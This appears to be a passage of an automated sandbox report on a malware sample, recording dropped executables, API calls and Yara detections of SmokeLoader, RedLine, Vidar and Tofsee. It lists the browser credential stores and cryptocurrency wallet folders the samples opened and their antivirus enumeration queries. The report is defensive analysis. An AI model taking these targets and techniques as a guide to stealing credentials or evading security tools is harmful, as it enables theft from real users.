                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: ___getlocaleinfo,GetCPInfo,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,InterlockedDecrement,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: _strlen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: GetLocaleInfoW,_malloc,__MarkAllocaS,GetLocaleInfoW,WideCharToMultiByte,WideCharToMultiByte,__freea,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: GetLocaleInfoW,GetACP,GetLocaleInfoW,
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: _GetLcidFromDefault,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,_GetLcidFromDefault,_ProcessCodePage,IsValidCodePage,IsValidLocale,_wcscpy_s,__invoke_watson_if_error,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: GetProcessHeap,RtlAllocateHeap,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,memset,LocalFree,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,___crtGetLocaleInfoA,_strncpy_s,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: __crtGetLocaleInfoA_stat,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: ___getlocaleinfo,__malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,__nh_malloc_dbg,___crtLCMapStringW,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: __crtGetLocaleInfoA_stat,_LocaleUpdate::~_LocaleUpdate,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: __nh_malloc_dbg,__malloc_dbg,__malloc_dbg,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_fix_grouping,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__nh_malloc_dbg,___crtGetLocaleInfoA,__nh_malloc_dbg,_strncpy_s,__invoke_watson_if_error,__nh_malloc_dbg,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9355.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9355.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Users\user\Desktop\3YzgU3S0nW.exeCode function: 1_2_0041C8AC __vswprintf_c_l,__wremove,_putc,_atexit,_malloc,_realloc,OpenMutexA,GetBinaryTypeA,SetCurrentDirectoryW,Process32FirstW,EnterCriticalSection,QueryDosDeviceA,TerminateJobObject,GlobalAddAtomA,UnlockFile,FreeResource,GetFullPathNameA,FindNextVolumeMountPointA,GetCompressedFileSizeA,FillConsoleOutputCharacterA,SetNamedPipeHandleState,lstrcpynA,FatalAppExitW,GetConsoleAliasesLengthA,GetProcessTimes,ChangeTimerQueueTimer,SetWaitableTimer,FindClose,CancelDeviceWakeupRequest,SignalObjectAndWait,GlobalReAlloc,OpenMutexA,GetLastError,HeapFree,GetComputerNameW,OpenMutexA,TlsAlloc,LoadLibraryW,GetConsoleScreenBufferInfo,FreeEnvironmentStringsA,GetWriteWatch,GetDevicePowerState,TransactNamedPipe,GetConsoleAliasExesLengthA,GetConsoleAliasA,GetConsoleCP,LockFileEx,VerLanguageNameA,lstrcpyA,SetFileShortNameW,GetThreadLocale,CreateSemaphoreA,CreateIoCompletionPort,FreeEnvironmentStringsW,CreateSemaphoreA,GetLocalTime,FindResourceExW,CreateIoCompletionPort,CreateSemaphoreA,SetTapeParameters,PeekConsoleInputA,CreateIoCompletionPort,GetProcAddress,HeapUnlock,GetFileAttributesExA,GetPrivateProfileStructW,TryEnterCriticalSection,GetPrivateProfileStructW,WritePrivateProfileSectionW,GetPrivateProfileSectionW,SetSystemTimeAdjustment,WriteConsoleW,EndUpdateResourceA,DefineDosDeviceA,LocalFileTimeToFileTime,InterlockedExchange,SetMailslotInfo,CreateActCtxA,lstrcatW,GetCurrentThreadId,TerminateProcess,GetSystemWow64DirectoryA,SetConsoleMode,WriteFile,lstrcmpA,GetPrivateProfileSectionW,DebugBreak,GetStringTypeExA,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_0040AD40 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_0040ACA0 GetProcessHeap,RtlAllocateHeap,GetUserNameA,
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_0040405E CreateEventA,ExitProcess,CloseHandle,CreateNamedPipeA,Sleep,CloseHandle,ConnectNamedPipe,GetLastError,DisconnectNamedPipe,CloseHandle,CloseHandle,CloseHandle,
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeCode function: 22_2_00406C10 GetVersionExA,LoadLibraryA,WideCharToMultiByte,lstrlen,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,lstrcat,lstrcat,lstrcat,WideCharToMultiByte,lstrcat,FreeLibrary,

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA &apos;AntiVirusProduct&apos; OR TargetInstance ISA &apos;FirewallProduct&apos; OR TargetInstance ISA &apos;AntiSpywareProduct&apos;
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct
                      Source: svchost.exe, 0000000A.00000002.551683404.0000016493E40000.00000004.00000001.sdmpBinary or memory string: @V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000A.00000002.551852695.0000016493F02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 24.2.9355.exe.353f9f0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.367bb70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.9355.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.353f9f0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.367bb70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.444404924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.442960124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.524710440.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.448220318.0000000003421000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.445129120.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 2.1.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.3YzgU3S0nW.exe.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.ahtdegs.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.1.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.7085.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.333615016.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.333559627.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387454153.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.322063888.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387405814.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000016.00000002.426246720.0000000000813000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.8A8A.exe.880000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.860e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.444369187.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.444506788.0000000000860000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.406594617.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8A8A.exe PID: 5776, type: MEMORYSTR
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Tries to steal Crypto Currency WalletsShow sources
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\MultiDoge\
                      Source: C:\Users\user\AppData\Local\Temp\8132.exeFile opened: C:\Users\user\AppData\Roaming\jaxx\Local Storage\
                      Source: C:\Users\user\AppData\Local\Temp\9355.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
                      Source: Yara matchFile source: 00000016.00000002.426246720.0000000000813000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 9355.exe PID: 4852, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected RedLine StealerShow sources
                      Source: Yara matchFile source: 24.2.9355.exe.353f9f0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.367bb70.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.2.9355.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.353f9f0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.12.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 24.2.9355.exe.367bb70.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 43.0.9355.exe.400000.8.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000002B.00000000.443464761.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.444404924.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.448461054.0000000003591000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.442960124.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000002.524710440.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000018.00000002.448220318.0000000003421000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000002B.00000000.445129120.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Yara detected SmokeLoaderShow sources
                      Source: Yara matchFile source: 2.1.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.3YzgU3S0nW.exe.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.1.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 15.2.ahtdegs.8715a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.1.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.7085.exe.7915a0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 17.2.7085.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 18.2.ahtdegs.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.0.3YzgU3S0nW.exe.400000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.3YzgU3S0nW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000002.00000002.333615016.00000000004D1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.333559627.00000000004A0000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387454153.00000000006A1000.00000004.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000000.322063888.0000000004DE1000.00000020.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000011.00000002.387405814.0000000000530000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected Vidar stealerShow sources
                      Source: Yara matchFile source: 00000016.00000002.426246720.0000000000813000.00000004.00000001.sdmp, type: MEMORY
                      Yara detected TofseeShow sources
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.3.8A8A.exe.880000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.8A8A.exe.860e50.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000017.00000002.444369187.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.444506788.0000000000860000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000003.406594617.0000000000880000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 8A8A.exe PID: 5776, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\8A8A.exeCode function: 23_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
